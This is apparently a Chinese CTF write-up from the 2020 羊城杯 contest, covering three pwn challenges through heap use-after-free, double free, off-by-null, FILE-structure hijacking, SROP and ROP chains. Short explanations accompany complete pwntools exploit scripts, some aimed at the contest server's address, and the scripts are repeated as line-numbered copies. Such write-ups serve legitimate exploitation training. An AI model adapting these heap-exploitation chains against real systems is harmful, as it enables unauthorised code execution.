2020-09-12

羊城杯

把三个简单的做了,mipspwn 是个栈溢出貌似,repwn需要逆向那个算法,然后leak stack地址和libc地址,server是个GET POST传参的菜单堆UAF洞附件

简单的UAF,一个double free 打到malloc_hook,然后realloc修栈

from pwn import*
context.log_level = 'DEBUG'
def menu(ch):
	p.sendlineafter('choice :',str(ch))
def new(size,name,content):
	menu(1)
	p.sendlineafter("game's name:",str(size))
	p.sendafter("game's name:",name)
	p.sendlineafter("game's message:",content)
def free(index):
	menu(3)
	p.sendlineafter('index:',str(index))
def show():
	menu(2)


p = process('./main')
#p =  remote('183.129.189.60',10029)
libc = ELF('./libc-2.23.so')
new(0x100,'FMYY','FMYY')
new(0x68,'FMYY','FMYY')
new(0x68,'FMYY','FMYY')
free(0)
new(0xD0,'\x78','\x78')
show()
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 88 - 0x10
log.info('LIBC:\t' + hex(libc_base))
malloc_hook = libc_base + libc.sym['__malloc_hook']
rce = libc_base + 0xF1207
realloc = libc_base + libc.sym['realloc']
free(1)
free(2)
free(1)
new(0x68,p64(malloc_hook - 0x23),'FMYY')
new(0x68,'FMYY','FMYY')
new(0x68,'FMYY','FMYY')
new(0x68,'\x00'*(0x13-8) + p64(rce) + p64(realloc + 4),'FMYY')
menu(1)
p.interactive()

easy_heap

简单的off by null,2.31的,然后有个沙盒,用malloc_hook + IO + SROP的劫持方法做即可 orw flag

from pwn import*
context.arch = 'AMD64'
#context.log_level = 'DEBUG'
def menu(ch):
	p.sendlineafter('Choice:',str(ch))
def new(size):
	menu(1)
	p.sendlineafter('Size: ',str(size))
def edit(index,content):
	menu(2)
	p.sendlineafter('Index:',str(index))
	p.sendafter('Content:',content)
def free(index):
	menu(3)
	p.sendlineafter('Index:',str(index))
def show(index):
	menu(4)
	p.sendlineafter('Index:',str(index))
p = process('./main')
p =  remote('183.129.189.60',10009)
libc =ELF('./libc-2.31.so')
for i in range(4):
	new(0x1000)
new(0x1000-0x3E0 - 0x50 + 0x10)
#--large bin
for i in range(7):
	new(0x28)
new(0xB20)
new(0x10)

free(12)
new(0x1000)
new(0x28) #14
edit(14,p64(0) + p64(0x521) + '\x40')
#--
#-- small bin 
new(0x28) #15
new(0x28) #16
new(0x28) #17
new(0x28) #18

for i in range(7): #5 - 11
	free(5+i)

free(17)
free(15)

for i in range(7):
	new(0x28)

new(0x400)  #15

new(0x28) #17
edit(17,p64(0) + '\x20')
new(0x28) # clear the tcache bin
#--

#--fast bin
for i in range(7):
	free(5 + i)
free(16)
free(14)
for i in range(7):
	new(0x28)
new(0x28)
edit(14,'\x20')
new(0x28)
#--
new(0x28) #20
new(0x5F8)
free(20)
new(0x28)
edit(20,'\x00'*0x20 + p64(0x520))
free(21)
new(0x40)
new(0x40)
show(16)
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - 0x60 -0x10 - libc.sym['__malloc_hook']
log.info('LIBC:\t' + hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
IO_stdin = libc_base +  libc.sym['_IO_2_1_stdin_']
free(22)
free(14)
new(0x28)
edit(14,p64(0) + p64(0x301))
new(0x2F0)
free(22)
free(21)
free(14)
new(0x28)
edit(14,'\x00'*0x10 + p64(IO_stdin))
################
pop_rdi_ret = libc_base + 0x0000000000026B72
pop_rdx_r12 = libc_base + 0x000000000011C1E1
pop_rsi_ret = libc_base + 0x0000000000027529
pop_rax_ret = libc_base + 0x000000000004A550
jmp_rsi  = libc_base + 0x00000000001105BD


syscall = libc_base + libc.sym['syscall']

target = libc_base + libc.sym['_IO_2_1_stdin_']
address = libc.sym['__free_hook'] + libc_base
IO_str_jumps = libc_base + 0x1ED560
frame_address = target + 0xE0

Open = libc_base + libc.symbols["open"]
Read = libc_base + libc.symbols["read"]
Puts = libc_base + libc.symbols['puts']
free_hook = address
IO  = '\x00'*0x28
IO += p64(frame_address)
IO  = IO.ljust(0xD8,'\x00')
IO += p64(IO_str_jumps)
read = libc_base + libc.sym['read']
frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = address
frame.rdx = 0x2000
frame.rsp = address
frame.rip = Read


orw  = p64(pop_rdi_ret)+p64(free_hook + 0xF8)
orw += p64(pop_rsi_ret)+p64(0)
orw += p64(Open)
orw += p64(pop_rdi_ret) + p64(3)
orw += p64(pop_rdx_r12) + p64(0x30) + p64(0)
orw += p64(pop_rsi_ret) + p64(free_hook+0x100)
orw += p64(Read)
orw += p64(pop_rdi_ret)+p64(free_hook+0x100)
orw += p64(Puts)
orw  = orw.ljust(0xF8,'\x00')
orw += './flag\x00\x00'
IO += str(frame)
IO += 'F'*0x18 + p64(libc_base + libc.sym['setcontext'] + 61)
###############
new(0x2F0)
new(0x2F0)
log.success('Now')
edit(22,IO)
menu(5)
p.sendlineafter('bye bye!',orw)
p.interactive()

babypwn

也是简单题,需要一个libc地址,释放一个块到fastbin,利用scanf输入数据过多会申请一个large bin chunk,故可以将fastbin中的chunk 放进small bin中,再申请回来拿到libc,一个double free申请过去即可打到malloc_hook

from pwn import*
context.log_level = 'DEBUG'
def menu(ch):
	p.sendlineafter('choice :',str(ch))
def new(size,name,content,sign=1):
	menu(1)
	p.sendlineafter("game's name:",str(size))
	p.sendafter("game's name:",name)
	if sign:
		p.sendlineafter("game's message:",content)
	else:
		p.sendline(content)
def free(index):
	menu(2)
	p.sendlineafter('index:',str(index))
	
p = process('./main')
p = remote('183.129.189.60',10031)
libc =ELF('./libc-2.23.so')
new(0x28,'FMYY','FMYY')
new(0x60,'FMYY','FMYY')
new(0x60,'FMYY','FMYY')
new(0x60,'FMYY','FMYY')
free(2)
menu(1)
p.sendlineafter("game's name:",'0'*0x500)
free(0)
new(0x60,'\xDD\x25','FMYY')
free(1)
free(3)
free(1)
new(0x60,'\x30','FMYY')
new(0x60,'FMYY','FMYY')
new(0x60,'FMYY','FMYY')
new(0x60,'FMYY','FMYY')
new(0x60,'\x00'*0x33 + p64(0xFBAD1800) + p64(0)*3 + '\x88','FMYY',sign=0)
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['_IO_2_1_stdin_']
malloc_hook = libc_base + libc.sym['__malloc_hook']
realloc = libc_base + libc.sym['realloc']
rce = libc_base + 0xF1207
free(5)
free(6)
free(5)
new(0x68,p64(malloc_hook - 0x23),'FMYY')
new(0x68,'FMYY','FMYY')
new(0x68,'FMYY','FMYY')
new(0x68,'\x00'*(0x13-8) + p64(rce) + p64(realloc + 4),'FMYY')
menu(1)
p.interactive()

1	from pwn import*
2	context.log_level = 'DEBUG'
3	def menu(ch):
4	p.sendlineafter('choice :',str(ch))
5	def new(size,name,content):
6	menu(1)
7	p.sendlineafter("game's name:",str(size))
8	p.sendafter("game's name:",name)
9	p.sendlineafter("game's message:",content)
10	def free(index):
11	menu(3)
12	p.sendlineafter('index:',str(index))
13	def show():
14	menu(2)
15
16
17	p = process('./main')
18	#p = remote('183.129.189.60',10029)
19	libc = ELF('./libc-2.23.so')
20	new(0x100,'FMYY','FMYY')
21	new(0x68,'FMYY','FMYY')
22	new(0x68,'FMYY','FMYY')
23	free(0)
24	new(0xD0,'\x78','\x78')
25	show()
26	libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 88 - 0x10
27	log.info('LIBC:\t' + hex(libc_base))
28	malloc_hook = libc_base + libc.sym['__malloc_hook']
29	rce = libc_base + 0xF1207
30	realloc = libc_base + libc.sym['realloc']
31	free(1)
32	free(2)
33	free(1)
34	new(0x68,p64(malloc_hook - 0x23),'FMYY')
35	new(0x68,'FMYY','FMYY')
36	new(0x68,'FMYY','FMYY')
37	new(0x68,'\x00'*(0x13-8) + p64(rce) + p64(realloc + 4),'FMYY')
38	menu(1)
39	p.interactive()

1	from pwn import*
2	context.arch = 'AMD64'
3	#context.log_level = 'DEBUG'
4	def menu(ch):
5	p.sendlineafter('Choice:',str(ch))
6	def new(size):
7	menu(1)
8	p.sendlineafter('Size: ',str(size))
9	def edit(index,content):
10	menu(2)
11	p.sendlineafter('Index:',str(index))
12	p.sendafter('Content:',content)
13	def free(index):
14	menu(3)
15	p.sendlineafter('Index:',str(index))
16	def show(index):
17	menu(4)
18	p.sendlineafter('Index:',str(index))
19	p = process('./main')
20	p = remote('183.129.189.60',10009)
21	libc =ELF('./libc-2.31.so')
22	for i in range(4):
23	new(0x1000)
24	new(0x1000-0x3E0 - 0x50 + 0x10)
25	#--large bin
26	for i in range(7):
27	new(0x28)
28	new(0xB20)
29	new(0x10)
30
31	free(12)
32	new(0x1000)
33	new(0x28) #14
34	edit(14,p64(0) + p64(0x521) + '\x40')
35	#--
36	#-- small bin
37	new(0x28) #15
38	new(0x28) #16
39	new(0x28) #17
40	new(0x28) #18
41
42	for i in range(7): #5 - 11
43	free(5+i)
44
45	free(17)
46	free(15)
47
48	for i in range(7):
49	new(0x28)
50
51	new(0x400) #15
52
53	new(0x28) #17
54	edit(17,p64(0) + '\x20')
55	new(0x28) # clear the tcache bin
56	#--
57
58	#--fast bin
59	for i in range(7):
60	free(5 + i)
61	free(16)
62	free(14)
63	for i in range(7):
64	new(0x28)
65	new(0x28)
66	edit(14,'\x20')
67	new(0x28)
68	#--
69	new(0x28) #20
70	new(0x5F8)
71	free(20)
72	new(0x28)
73	edit(20,'\x00'*0x20 + p64(0x520))
74	free(21)
75	new(0x40)
76	new(0x40)
77	show(16)
78	libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - 0x60 -0x10 - libc.sym['__malloc_hook']
79	log.info('LIBC:\t' + hex(libc_base))
80	free_hook = libc_base + libc.sym['__free_hook']
81	system = libc_base + libc.sym['system']
82	IO_stdin = libc_base + libc.sym['_IO_2_1_stdin_']
83	free(22)
84	free(14)
85	new(0x28)
86	edit(14,p64(0) + p64(0x301))
87	new(0x2F0)
88	free(22)
89	free(21)
90	free(14)
91	new(0x28)
92	edit(14,'\x00'*0x10 + p64(IO_stdin))
93	################
94	pop_rdi_ret = libc_base + 0x0000000000026B72
95	pop_rdx_r12 = libc_base + 0x000000000011C1E1
96	pop_rsi_ret = libc_base + 0x0000000000027529
97	pop_rax_ret = libc_base + 0x000000000004A550
98	jmp_rsi = libc_base + 0x00000000001105BD
99
100
101	syscall = libc_base + libc.sym['syscall']
102
103	target = libc_base + libc.sym['_IO_2_1_stdin_']
104	address = libc.sym['__free_hook'] + libc_base
105	IO_str_jumps = libc_base + 0x1ED560
106	frame_address = target + 0xE0
107
108	Open = libc_base + libc.symbols["open"]
109	Read = libc_base + libc.symbols["read"]
110	Puts = libc_base + libc.symbols['puts']
111	free_hook = address
112	IO = '\x00'*0x28
113	IO += p64(frame_address)
114	IO = IO.ljust(0xD8,'\x00')
115	IO += p64(IO_str_jumps)
116	read = libc_base + libc.sym['read']
117	frame = SigreturnFrame()
118	frame.rax = 0
119	frame.rdi = 0
120	frame.rsi = address
121	frame.rdx = 0x2000
122	frame.rsp = address
123	frame.rip = Read
124
125
126	orw = p64(pop_rdi_ret)+p64(free_hook + 0xF8)
127	orw += p64(pop_rsi_ret)+p64(0)
128	orw += p64(Open)
129	orw += p64(pop_rdi_ret) + p64(3)
130	orw += p64(pop_rdx_r12) + p64(0x30) + p64(0)
131	orw += p64(pop_rsi_ret) + p64(free_hook+0x100)
132	orw += p64(Read)
133	orw += p64(pop_rdi_ret)+p64(free_hook+0x100)
134	orw += p64(Puts)
135	orw = orw.ljust(0xF8,'\x00')
136	orw += './flag\x00\x00'
137	IO += str(frame)
138	IO += 'F'*0x18 + p64(libc_base + libc.sym['setcontext'] + 61)
139	###############
140	new(0x2F0)
141	new(0x2F0)
142	log.success('Now')
143	edit(22,IO)
144	menu(5)
145	p.sendlineafter('bye bye!',orw)
146	p.interactive()

sign_in

easy_heap

babypwn